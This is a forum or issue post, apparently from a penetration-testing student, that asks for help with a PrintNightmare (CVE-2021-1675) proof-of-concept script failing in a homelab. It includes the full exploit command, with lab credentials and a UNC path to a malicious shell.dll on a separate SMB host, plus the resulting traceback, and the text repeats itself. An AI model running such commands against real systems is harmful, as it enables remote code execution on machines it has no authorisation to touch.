Attempting to run this PoC within my homelab and running into a few issues. Looked online and saw adding -smb2support might work, but it didn't change anything.
Running the following code;
sudo python3 CVE-2021-1675.py MARVEL.local/fcastle:Password1@192.168.71.154 '\\192.168.71.151\share\shell.dll'
Getting the following output;
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ec1e73781eaf7fda\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.71.151\share\shell.dll
[*] Try 1...
Traceback (most recent call last):
File "/home/kali/Documents/PJPT/CVE-2021-1675.py", line 188, in <module>
main(dce, pDriverPath, options.share)
File "/home/kali/Documents/PJPT/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: unknown error code: 0x180
As a note, I am actually running this against workstations, not a DC. However, the pre-check flagged for the homelab host machines.
Hi,
Attempting to run this PoC within my homelab and running into a few issues. Looked online and saw adding
-smb2support
might work, but it didn't change anything.Running the following code;
sudo python3 CVE-2021-1675.py MARVEL.local/fcastle:Password1@192.168.71.154 '\\192.168.71.151\share\shell.dll'
Getting the following output;
As a note, I am actually running this against workstations, not a DC. However, the pre-check flagged for the homelab host machines.
Any help appreciated, thanks.